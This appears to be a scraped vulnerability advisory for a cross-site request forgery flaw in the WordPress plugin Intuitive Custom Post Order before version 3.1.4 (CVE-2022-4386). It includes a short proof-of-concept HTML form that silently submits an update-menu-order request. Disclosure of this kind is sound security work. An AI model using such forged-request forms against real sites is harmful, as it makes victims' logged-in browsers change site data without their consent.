Lucene search
Yuya KotakeWPEX-ID:734064E3-AFE9-4DFD-8D76-8A757CC94815HistoryJan 24, 2023 - 12:00 a.m.
Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF
2023-01-2400:00:00
Yuya Kotake
132
csrf attack
cross-site request forgery
intuitive custom post order vulnerability
arbitrary menu order update
0.001 Low
EPSS
Percentile
29.5%
The plugin lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="update-menu-order" />
<input type="hidden" name="order" value="post[]=7&post[]=5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
cve
cve
CVE-2022-4386
2023-02-21 09:15:10
nvd
nvd
CVE-2022-4386
2023-02-21 09:15:10
prion
prion
Cross site request forgery (csrf)
2023-02-21 09:15:00
cvelist
cvelist
wpvulndb
wpvulndb
Intuitive Custom Post Order < 3.1.4 - Arbitrary Menu Order Update via CSRF
2023-01-24 00:00:00
openvas
openvas